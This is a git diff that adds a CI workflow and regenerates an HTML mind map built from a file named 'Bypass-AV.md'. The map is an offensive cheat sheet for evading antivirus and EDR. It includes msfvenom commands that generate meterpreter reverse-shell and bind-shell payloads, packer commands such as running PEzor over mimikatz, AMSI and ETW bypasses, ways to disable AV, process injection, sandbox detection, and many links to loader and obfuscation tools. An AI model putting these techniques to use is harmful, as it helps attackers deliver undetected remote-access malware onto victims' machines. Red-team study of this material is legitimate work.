diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml new file mode 100644 index 0000000..0e51bec --- /dev/null +++ b/.github/workflows/ci.yaml @@ -0,0 +1,34 @@ +name: Generate the new index.html if necessary and upload as artifact + +on: + pull_request: + push: + branches: + - main + +jobs: + generate-index-html: + name: Validate Go code linting + runs-on: ubuntu-latest + steps: + - name: Checkout code + uses: actions/checkout@v3 + - name: Set Node.js 16.x + uses: actions/setup-node@v3 + with: + node-version: 16.x + - name: Install markmap-cli + run: npm install -g markmap-cli + - name: Run markmap-cli to export as HTML + run: markmap Bypass-AV.md -o docs/index.html + - name: Run markmap-cli to export as HTML + run: markmap Bypass-AV.md -o docs/index.html + - name: Commit the new HTML index file if necessary + uses: stefanzweifel/git-auto-commit-action@v4 + with: + commit_message: Auto-update the index.html + file_pattern: docs/index.html + - uses: actions/upload-artifact@v3 + with: + name: index.html + path: docs/index.html diff --git a/docs/index.html b/docs/index.html index de5e4bd..7611f5a 100644 --- a/docs/index.html +++ b/docs/index.html @@ -16,13 +16,13 @@ height: 100vh; } - + - + })(() => window.markmap,null,{"type":"heading","depth":0,"payload":{"lines":[0,1]},"content":"Bypass AV","children":[{"type":"heading","depth":1,"payload":{"lines":[2,3]},"content":"Manual loader","children":[{"type":"heading","depth":2,"payload":{"lines":[4,5]},"content":"Reminder","children":[{"type":"list_item","depth":3,"payload":{"lines":[6,7],"index":1},"content":"1. allocating memory"},{"type":"list_item","depth":3,"payload":{"lines":[7,8],"index":2},"content":"2. moving shellcode into that memory"},{"type":"list_item","depth":3,"payload":{"lines":[8,9],"index":3},"content":"3. executing the shellcode"}]},{"type":"heading","depth":2,"payload":{"lines":[10,11]},"content":"C","children":[{"type":"list_item","depth":3,"payload":{"lines":[12,27]},"content":"
#include <iostream>\n#include <Windows.h>\n\nint main(void) {\n  HMODULE hMod = LoadLibrary("shellcode.dll");\n  if (hMod == nullptr) {\n    cout << "Failed to load shellcode.dll" << endl;\n  }\n\n  return 0;\n}\n
\n"}]},{"type":"heading","depth":2,"payload":{"lines":[27,28]},"content":"C++","children":[{"type":"list_item","depth":3,"payload":{"lines":[29,30]},"content":"https://medium.com/securebit/bypassing-av-through-metasploit-loader-64-bit-9abe55e3e0c8"},{"type":"list_item","depth":3,"payload":{"lines":[30,31]},"content":"https://github.com/ReversingID/Shellcode-Loader/tree/master/windows"}]},{"type":"heading","depth":2,"payload":{"lines":[32,33]},"content":".NET","children":[{"type":"list_item","depth":3,"payload":{"lines":[34,35]},"content":"https://sevrosecurity.com/2019/05/25/bypass-windows-defender-with-a-simple-shell-loader/"}]},{"type":"heading","depth":2,"payload":{"lines":[36,37]},"content":"Ruby","children":[{"type":"list_item","depth":3,"payload":{"lines":[38,39]},"content":"https://blog.king-sabri.net/red-team/how-to-execute-raw-shellcode-using-ruby-on-windows-and-linux"}]}]},{"type":"heading","depth":1,"payload":{"lines":[40,41]},"content":"Automatic loader","children":[{"type":"heading","depth":2,"payload":{"lines":[42,43]},"content":"C++","children":[{"type":"list_item","depth":3,"payload":{"lines":[44,45]},"content":"https://github.com/TheD1rkMtr/D1rkLrd"},{"type":"list_item","depth":3,"payload":{"lines":[45,46]},"content":"https://github.com/xuanxuan0/DripLoader"},{"type":"list_item","depth":3,"payload":{"lines":[46,47]},"content":"https://github.com/Hagrid29/PELoader"},{"type":"list_item","depth":3,"payload":{"lines":[47,48]},"content":"https://github.com/icyguider/Shhhloader"}]},{"type":"heading","depth":2,"payload":{"lines":[49,50]},"content":"C","children":[{"type":"list_item","depth":3,"payload":{"lines":[51,52]},"content":"https://github.com/cribdragg3r/Alaris"},{"type":"list_item","depth":3,"payload":{"lines":[52,53]},"content":"https://github.com/trustedsec/COFFLoader"}]},{"type":"heading","depth":2,"payload":{"lines":[54,55]},"content":"Nim","children":[{"type":"list_item","depth":3,"payload":{"lines":[56,57]},"content":"https://github.com/aeverj/NimShellCodeLoader"},{"type":"list_item","depth":3,"payload":{"lines":[57,58]},"content":"https://github.com/sh3d0ww01f/nim_shellloader"}]},{"type":"heading","depth":2,"payload":{"lines":[59,60]},"content":"Go","children":[{"type":"list_item","depth":3,"payload":{"lines":[61,62]},"content":"https://github.com/EddieIvan01/gld"},{"type":"list_item","depth":3,"payload":{"lines":[62,63]},"content":"https://github.com/zha0gongz1/DesertFox"}]},{"type":"heading","depth":2,"payload":{"lines":[64,65]},"content":"Rust","children":[{"type":"list_item","depth":3,"payload":{"lines":[66,67]},"content":"https://github.com/b1tg/rs_shellcode"},{"type":"list_item","depth":3,"payload":{"lines":[67,68]},"content":"https://github.com/r4ime/shellcode_loader"},{"type":"list_item","depth":3,"payload":{"lines":[68,69]},"content":"https://github.com/cr7pt0pl4gu3/Pestilence"}]},{"type":"heading","depth":2,"payload":{"lines":[70,71]},"content":"Crystal","children":[{"type":"list_item","depth":3,"payload":{"lines":[72,73]},"content":"https://github.com/js-on/WeaponizeCrystal/blob/main/shellcode_loader/shellcode_loader.cr"}]}]},{"type":"heading","depth":1,"payload":{"lines":[74,75]},"content":"Generate shellcode","children":[{"type":"heading","depth":2,"payload":{"lines":[76,77]},"content":"msfvenom","children":[{"type":"list_item","depth":3,"payload":{"lines":[78,79]},"content":"msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<SERVER> LPORT=<PORT> -f raw"},{"type":"list_item","depth":3,"payload":{"lines":[79,80]},"content":"msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 --encrypt rc4 --encrypt-key thisisakey -f dll"},{"type":"list_item","depth":3,"payload":{"lines":[80,81]},"content":"msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai '\\x00' -i 30 RHOST=10.0.0.68 LPORT=9050 -f c | tr -d '"' | tr -d '\\n' | more"}]},{"type":"heading","depth":2,"payload":{"lines":[82,83]},"content":"C2 (Cobalt/Havoc what ever)"},{"type":"heading","depth":2,"payload":{"lines":[84,85]},"content":"ASM","children":[{"type":"list_item","depth":3,"payload":{"lines":[86,87]},"content":"https://nytrosecurity.com/2019/06/30/writing-shellcodes-for-windows-x64/"}]},{"type":"heading","depth":2,"payload":{"lines":[88,89]},"content":"Hyperion","children":[{"type":"list_item","depth":3,"payload":{"lines":[90,91]},"content":"wine hyperion.exe /root/payloads/shellter/shellter_putty_reverse_x86.exe"}]}]},{"type":"heading","depth":1,"payload":{"lines":[92,93]},"content":"Manual obfuscation","children":[{"type":"heading","depth":2,"payload":{"lines":[94,95]},"content":"Static","children":[{"type":"list_item","depth":3,"payload":{"lines":[96,97]},"content":"Packing","children":[{"type":"list_item","depth":4,"payload":{"lines":[97,98]},"content":"https://pentester.blog/?p=39"}]},{"type":"list_item","depth":3,"payload":{"lines":[98,99]},"content":"Polymorph","children":[{"type":"list_item","depth":4,"payload":{"lines":[99,100]},"content":"https://www.exploit-db.com/papers/13874"}]},{"type":"list_item","depth":3,"payload":{"lines":[100,101]},"content":"Signature hiding","children":[{"type":"list_item","depth":4,"payload":{"lines":[101,102]},"content":"https://www.ired.team/offensive-security/defense-evasion/av-bypass-with-metasploit-templates"}]},{"type":"list_item","depth":3,"payload":{"lines":[102,103]},"content":"CFG","children":[{"type":"list_item","depth":4,"payload":{"lines":[103,104]},"content":"ROP","children":[{"type":"list_item","depth":5,"payload":{"lines":[104,105]},"content":"https://improsec.com/tech-blog/bypassing-control-flow-guard-on-windows-10-part-ii"}]},{"type":"list_item","depth":4,"payload":{"lines":[105,106]},"content":"https://joshpitts.medium.com/hooking-control-flow-guard-cfg-for-fun-and-profit-31f951485545"},{"type":"list_item","depth":4,"payload":{"lines":[106,107]},"content":"https://citeseerx.ist.psu.edu/document?repid=rep1&type=pdf&doi=ade1cc22ee994c1b353326ae4cedccd29f33b8d0"},{"type":"list_item","depth":4,"payload":{"lines":[107,108]},"content":"CFG flattening","children":[{"type":"list_item","depth":5,"payload":{"lines":[108,109]},"content":"http://ac.inf.elte.hu/Vol_030_2009/003.pdf"}]}]},{"type":"list_item","depth":3,"payload":{"lines":[109,110]},"content":"Change logo/icon","children":[{"type":"list_item","depth":4,"payload":{"lines":[110,111]},"content":"https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/resources?redirectedfrom=MSDN"}]},{"type":"list_item","depth":3,"payload":{"lines":[111,112]},"content":"Change date of compilation"},{"type":"list_item","depth":3,"payload":{"lines":[112,113]},"content":"Bypass AMSI","children":[{"type":"list_item","depth":4,"payload":{"lines":[113,114]},"content":"https://rastamouse.me/memory-patching-amsi-bypass/"},{"type":"list_item","depth":4,"payload":{"lines":[114,115]},"content":"https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/"},{"type":"list_item","depth":4,"payload":{"lines":[115,116]},"content":"https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/"}]},{"type":"list_item","depth":3,"payload":{"lines":[116,117]},"content":"Description"}]},{"type":"heading","depth":2,"payload":{"lines":[118,119]},"content":"dynamic","children":[{"type":"list_item","depth":3,"payload":{"lines":[120,121]},"content":"Network","children":[{"type":"list_item","depth":4,"payload":{"lines":[121,122]},"content":"C2 by DNS"},{"type":"list_item","depth":4,"payload":{"lines":[122,123]},"content":"P2P (hide ip from C2)"},{"type":"list_item","depth":4,"payload":{"lines":[123,124]},"content":"HTTPS"}]},{"type":"list_item","depth":3,"payload":{"lines":[124,125]},"content":"Direct syscalls","children":[{"type":"list_item","depth":4,"payload":{"lines":[125,126]},"content":"https://medium.com/@merasor07/av-edr-evasion-using-direct-system-calls-user-mode-vs-kernel-mode-fad2fdfed01a"},{"type":"list_item","depth":4,"payload":{"lines":[126,127]},"content":"https://thewover.github.io/Dynamic-Invoke/"}]},{"type":"list_item","depth":3,"payload":{"lines":[127,128]},"content":"Delayed execution","children":[{"type":"list_item","depth":4,"payload":{"lines":[128,129]},"content":"WaitForSingleObjectEx","children":[{"type":"list_item","depth":5,"payload":{"lines":[129,130]},"content":"https://www.purpl3f0xsecur1ty.tech/2021/03/30/av_evasion.html"}]},{"type":"list_item","depth":4,"payload":{"lines":[130,131]},"content":"Foliage"},{"type":"list_item","depth":4,"payload":{"lines":[131,132]},"content":"Ekko","children":[{"type":"list_item","depth":5,"payload":{"lines":[132,133]},"content":"A small sleep obfuscation technique that uses CreateTimerQueueTimer Win32 API"}]},{"type":"list_item","depth":4,"payload":{"lines":[133,134]},"content":"Deathsleep","children":[{"type":"list_item","depth":5,"payload":{"lines":[134,135]},"content":"https://github.com/janoglezcampos/DeathSleep"}]}]},{"type":"list_item","depth":3,"payload":{"lines":[135,136]},"content":"Disable ETW","children":[{"type":"list_item","depth":4,"payload":{"lines":[136,137]},"content":"https://www.mdsec.co.uk/2020/03/hiding-your-net-etw/"}]},{"type":"list_item","depth":3,"payload":{"lines":[137,138]},"content":"DInvoke","children":[{"type":"list_item","depth":4,"payload":{"lines":[138,139]},"content":"https://github.com/TheWover/DInvoke"}]}]}]},{"type":"heading","depth":1,"payload":{"lines":[140,141]},"content":"Automatic obfuscation","children":[{"type":"heading","depth":2,"payload":{"lines":[142,143]},"content":"Static","children":[{"type":"list_item","depth":3,"payload":{"lines":[144,145]},"content":"Packing","children":[{"type":"list_item","depth":4,"payload":{"lines":[145,146]},"content":"Office macro","children":[{"type":"list_item","depth":5,"payload":{"lines":[146,147]},"content":"https://github.com/sevagas/macro_pack"},{"type":"list_item","depth":5,"payload":{"lines":[147,148]},"content":"https://github.com/optiv/Ivy"}]},{"type":"list_item","depth":4,"payload":{"lines":[148,149]},"content":"https://github.com/phra/PEzor"},{"type":"list_item","depth":4,"payload":{"lines":[149,150]},"content":"https://github.com/klezVirus/inceptor"},{"type":"list_item","depth":4,"payload":{"lines":[150,151]},"content":"https://github.com/govolution/avet"},{"type":"list_item","depth":4,"payload":{"lines":[151,152]},"content":"https://github.com/Nariod/RustPacker"},{"type":"list_item","depth":4,"payload":{"lines":[152,153]},"content":"https://github.com/DavidBuchanan314/monomorph"},{"type":"list_item","depth":4,"payload":{"lines":[153,154]},"content":"https://github.com/upx/upx"}]},{"type":"list_item","depth":3,"payload":{"lines":[154,155]},"content":"AMSI Bypass","children":[{"type":"list_item","depth":4,"payload":{"lines":[155,156]},"content":"https://github.com/CCob/SharpBlock"},{"type":"list_item","depth":4,"payload":{"lines":[156,157]},"content":"https://github.com/danielbohannon/Invoke-Obfuscation"},{"type":"list_item","depth":4,"payload":{"lines":[157,158]},"content":"https://github.com/klezVirus/Chameleon"},{"type":"list_item","depth":4,"payload":{"lines":[158,159]},"content":"https://github.com/tokyoneon/Chimera"}]},{"type":"list_item","depth":3,"payload":{"lines":[159,160]},"content":"Signature hiding","children":[{"type":"list_item","depth":4,"payload":{"lines":[160,161]},"content":"https://github.com/optiv/ScareCrow","children":[{"type":"list_item","depth":5,"payload":{"lines":[161,162]},"content":"ScareCrow -I /Path/To/ShellCode -d facebook.com"}]},{"type":"list_item","depth":4,"payload":{"lines":[162,163]},"content":"https://github.com/paranoidninja/CarbonCopy"}]},{"type":"list_item","depth":3,"payload":{"lines":[163,164]},"content":"LOLBIN","children":[{"type":"list_item","depth":4,"payload":{"lines":[164,165]},"content":"RemComSvc","children":[{"type":"list_item","depth":5,"payload":{"lines":[165,166]},"content":"https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb"}]}]},{"type":"list_item","depth":3,"payload":{"lines":[166,167]},"content":"Entropy","children":[{"type":"list_item","depth":4,"payload":{"lines":[167,168]},"content":"https://github.com/kleiton0x00/Shelltropy"}]}]},{"type":"heading","depth":2,"payload":{"lines":[169,170]},"content":"Dynamic","children":[{"type":"list_item","depth":3,"payload":{"lines":[171,172]},"content":"Disable ETW","children":[{"type":"list_item","depth":4,"payload":{"lines":[172,173]},"content":"https://github.com/optiv/ScareCrow"},{"type":"list_item","depth":4,"payload":{"lines":[173,174]},"content":"https://gist.github.com/tandasat/e595c77c52e13aaee60e1e8b65d2ba32"},{"type":"list_item","depth":4,"payload":{"lines":[174,175]},"content":"https://github.com/Soledge/BlockEtw"},{"type":"list_item","depth":4,"payload":{"lines":[175,176]},"content":"https://github.com/CCob/SharpBlock"}]},{"type":"list_item","depth":3,"payload":{"lines":[176,177]},"content":"Indirect syscall","children":[{"type":"list_item","depth":4,"payload":{"lines":[177,178]},"content":"https://github.com/optiv/Freeze","children":[{"type":"list_item","depth":5,"payload":{"lines":[178,179]},"content":"Freeze -I /PathToShellcode -encrypt -sandbox -o packed.exe"}]},{"type":"list_item","depth":4,"payload":{"lines":[179,180]},"content":"https://github.com/phra/PEzor","children":[{"type":"list_item","depth":5,"payload":{"lines":[180,181]},"content":"PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=120 mimikatz/x64/mimikatz.exe -z 2"}]},{"type":"list_item","depth":4,"payload":{"lines":[181,182]},"content":"https://github.com/optiv/ScareCrow"},{"type":"list_item","depth":4,"payload":{"lines":[182,183]},"content":"https://github.com/klezVirus/SysWhispers3"},{"type":"list_item","depth":4,"payload":{"lines":[183,184]},"content":"https://github.com/jthuraisamy/SysWhispers2"}]},{"type":"list_item","depth":3,"payload":{"lines":[184,185]},"content":"Disable AV","children":[{"type":"list_item","depth":4,"payload":{"lines":[185,186]},"content":"https://github.com/APTortellini/unDefender"}]},{"type":"list_item","depth":3,"payload":{"lines":[186,187]},"content":"Block DLL"},{"type":"list_item","depth":3,"payload":{"lines":[187,188]},"content":"https://github.com/CCob/SharpBlock"},{"type":"list_item","depth":3,"payload":{"lines":[188,189]},"content":"Detect virtual machines"},{"type":"list_item","depth":3,"payload":{"lines":[189,190]},"content":"https://github.com/a0rtega/pafish"}]}]},{"type":"heading","depth":1,"payload":{"lines":[191,192]},"content":"Process injection","children":[{"type":"heading","depth":2,"payload":{"lines":[193,194]},"content":"CRT","children":[{"type":"list_item","depth":3,"payload":{"lines":[195,196]},"content":"with suspended"},{"type":"list_item","depth":3,"payload":{"lines":[196,197]},"content":"https://damonmohammadbagher.medium.com/bypassing-anti-virus-by-creating-remote-thread-into-target-process-45f145b2ac7a"}]},{"type":"heading","depth":2,"payload":{"lines":[198,199]},"content":"APC (Asyncronous Procedure Call)","children":[{"type":"list_item","depth":3,"payload":{"lines":[200,201]},"content":"https://subscription.packtpub.com/book/security/9781789610789/8/ch08lvl1sec50/executing-the-inject-code-using-apc-queuing"}]},{"type":"heading","depth":2,"payload":{"lines":[202,203]},"content":"Process hollowing","children":[{"type":"list_item","depth":3,"payload":{"lines":[204,205]},"content":"https://www.ired.team/offensive-security/code-injection-process-injection/process-hollowing-and-pe-image-relocations#relocation"},{"type":"list_item","depth":3,"payload":{"lines":[205,206]},"content":"https://sevrosecurity.com/2020/04/08/process-injection-part-1-createremotethread/"}]},{"type":"heading","depth":2,"payload":{"lines":[207,208]},"content":"Thread execution hijacking","children":[{"type":"list_item","depth":3,"payload":{"lines":[209,210]},"content":"https://attack.mitre.org/techniques/T1055/003/"}]},{"type":"heading","depth":2,"payload":{"lines":[211,212]},"content":"PSC (Ptrace System Calls)"},{"type":"heading","depth":2,"payload":{"lines":[213,214]},"content":"Process Doppelganging","children":[{"type":"list_item","depth":3,"payload":{"lines":[215,216]},"content":"https://thehackernews.com/2017/12/malware-process-doppelganging.html"}]},{"type":"heading","depth":2,"payload":{"lines":[217,218]},"content":"Dll injection","children":[{"type":"bullet_list","depth":3,"payload":{"lines":[219,223]},"content":"","children":[{"type":"list_item","depth":4,"payload":{"lines":[219,220]},"content":"Reflective dll injection","children":[{"type":"list_item","depth":5,"payload":{"lines":[220,221]},"content":"https://disman.tl/2015/01/30/an-improved-reflective-dll-injection-technique.html"}]},{"type":"list_item","depth":4,"payload":{"lines":[221,222]},"content":"https://github.com/fancycode/MemoryModule"},{"type":"list_item","depth":4,"payload":{"lines":[222,223]},"content":""}]},{"type":"bullet_list","depth":3,"payload":{"lines":[224,227]},"content":"","children":[{"type":"list_item","depth":4,"payload":{"lines":[224,225]},"content":"DLL Sideloading & Proxying","children":[{"type":"list_item","depth":5,"payload":{"lines":[225,226]},"content":"https://book.hacktricks.xyz/windows-hardening/windows-av-bypass#dll-sideloading-and-proxying"}]}]}]},{"type":"heading","depth":2,"payload":{"lines":[227,228]},"content":"RWX","children":[{"type":"list_item","depth":3,"payload":{"lines":[229,230]},"content":"You put your region in RW, you write your shellcode, then you reprotect in RX, then you run the thread. This way your region is never in rwx"}]},{"type":"heading","depth":2,"payload":{"lines":[231,232]},"content":"COM Hijack","children":[{"type":"list_item","depth":3,"payload":{"lines":[233,234]},"content":"https://www.mdsec.co.uk/2022/04/process-injection-via-component-object-model-com-irundowndocallback/"},{"type":"list_item","depth":3,"payload":{"lines":[234,235]},"content":"https://0xpat.github.io/Abusing_COM_Objects/"}]},{"type":"heading","depth":2,"payload":{"lines":[236,237]},"content":"Remote thread","children":[{"type":"list_item","depth":3,"payload":{"lines":[238,239]},"content":"https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/"}]},{"type":"heading","depth":2,"payload":{"lines":[240,241]},"content":"User APC","children":[{"type":"list_item","depth":3,"payload":{"lines":[242,243]},"content":"https://www.cyberbit.com/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/"}]}]},{"type":"heading","depth":1,"payload":{"lines":[244,245]},"content":"Detect virtual machines (Sandbox)","children":[{"type":"heading","depth":2,"payload":{"lines":[246,247]},"content":"Software","children":[{"type":"list_item","depth":3,"payload":{"lines":[248,249]},"content":"Count processus number","children":[{"type":"list_item","depth":4,"payload":{"lines":[249,250]},"content":"if >=40 its probably not a VM"}]},{"type":"list_item","depth":3,"payload":{"lines":[250,251]},"content":"User interaction","children":[{"type":"list_item","depth":4,"payload":{"lines":[251,252]},"content":"Send MessageBoxW"}]},{"type":"list_item","depth":3,"payload":{"lines":[252,253]},"content":"Check for internet"},{"type":"list_item","depth":3,"payload":{"lines":[253,254]},"content":"Datetime on compilation"},{"type":"list_item","depth":3,"payload":{"lines":[254,255]},"content":"Check for Computer name","children":[{"type":"list_item","depth":4,"payload":{"lines":[255,256]},"content":"VM = DESKTOP-[0-9A-Z]{7}"}]}]},{"type":"heading","depth":2,"payload":{"lines":[257,258]},"content":"Hardware","children":[{"type":"list_item","depth":3,"payload":{"lines":[259,260]},"content":"CPUID timing","children":[{"type":"list_item","depth":4,"payload":{"lines":[260,261]},"content":"https://github.com/CMEPW/bof-collection/blob/main/src/checkVM/checkVM2.c"}]},{"type":"list_item","depth":3,"payload":{"lines":[261,262]},"content":"Typical user workstation has a processor with at least 2 cores, a minimum of 2 GB of RAM and a 100 GB hard drive"}]},{"type":"heading","depth":2,"payload":{"lines":[263,264]},"content":"OSX","children":[{"type":"list_item","depth":3,"payload":{"lines":[265,266]},"content":"https://evasions.checkpoint.com/techniques/macos.html#macos-sandbox-methods"}]},{"type":"heading","depth":2,"payload":{"lines":[267,268]},"content":"Tools","children":[{"type":"list_item","depth":3,"payload":{"lines":[269,270]},"content":"https://github.com/a0rtega/pafish"}]}]},{"type":"heading","depth":1,"payload":{"lines":[271,272]},"content":"From PE to shellcode","children":[{"type":"list_item","depth":2,"payload":{"lines":[273,274]},"content":"https://github.com/S4ntiagoP/donut/tree/syscalls"},{"type":"list_item","depth":2,"payload":{"lines":[274,275]},"content":"https://github.com/hasherezade/pe_to_shellcode"},{"type":"list_item","depth":2,"payload":{"lines":[275,276]},"content":"https://github.com/monoxgas/sRDI"}]},{"type":"heading","depth":1,"payload":{"lines":[277,278]},"content":"From alive beacon","children":[{"type":"heading","depth":2,"payload":{"lines":[279,280]},"content":"Havoc","children":[{"type":"list_item","depth":3,"payload":{"lines":[281,282]},"content":"dotnet (object file)"}]},{"type":"heading","depth":2,"payload":{"lines":[283,284]},"content":"Cobalt","children":[{"type":"list_item","depth":3,"payload":{"lines":[285,286]},"content":"BoF (Beacon object file)","children":[{"type":"list_item","depth":4,"payload":{"lines":[286,287]},"content":"From .net to BoF","children":[{"type":"list_item","depth":5,"payload":{"lines":[287,288]},"content":"https://github.com/CCob/BOF.NET"}]},{"type":"list_item","depth":4,"payload":{"lines":[288,289]},"content":"https://github.com/trustedsec/CS-Situational-Awareness-BOF"}]}]}]},{"type":"heading","depth":1,"payload":{"lines":[290,291]},"content":"Extensions","children":[{"type":"heading","depth":2,"payload":{"lines":[292,293]},"content":"Dll"},{"type":"heading","depth":2,"payload":{"lines":[294,295]},"content":"Exe"},{"type":"heading","depth":2,"payload":{"lines":[296,297]},"content":"Hta"},{"type":"heading","depth":2,"payload":{"lines":[298,299]},"content":"Cpl"},{"type":"heading","depth":2,"payload":{"lines":[300,301]},"content":"Link"}]},{"type":"heading","depth":1,"payload":{"lines":[302,303]},"content":"Crédits","children":[{"type":"list_item","depth":2,"payload":{"lines":[304,305]},"content":"@Jenaye_fr"},{"type":"list_item","depth":2,"payload":{"lines":[305,306]},"content":"LeDocteurDesBits"},{"type":"list_item","depth":2,"payload":{"lines":[306,307]},"content":"michmich1000"},{"type":"list_item","depth":2,"payload":{"lines":[307,308]},"content":"@Zabannn"},{"type":"list_item","depth":2,"payload":{"lines":[308,309]},"content":"@noraj_rawsec"},{"type":"list_item","depth":2,"payload":{"lines":[309,310]},"content":"@lapinousexy"}]},{"type":"heading","depth":1,"payload":{"lines":[311,312]},"content":"Pro tips : A shellcode sent in 3 open sources packer will have more chance to be caught than a manual obfuscation"}]},{"colorFreezeLevel":3,"initialExpandLevel":2})